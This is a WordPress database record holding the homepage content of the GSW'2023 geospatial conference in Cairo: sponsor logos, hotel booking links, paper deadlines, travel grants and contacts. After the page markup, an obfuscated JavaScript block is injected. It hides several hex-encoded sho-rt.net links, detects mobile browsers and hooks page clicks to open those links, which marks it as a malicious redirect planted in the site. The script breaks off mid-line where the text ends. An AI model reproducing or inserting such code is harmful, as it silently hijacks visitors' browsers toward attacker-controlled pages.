(4596,1,'2023-06-01 08:07:30','2023-06-01 08:07:30','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685606798260{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684201412150{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge 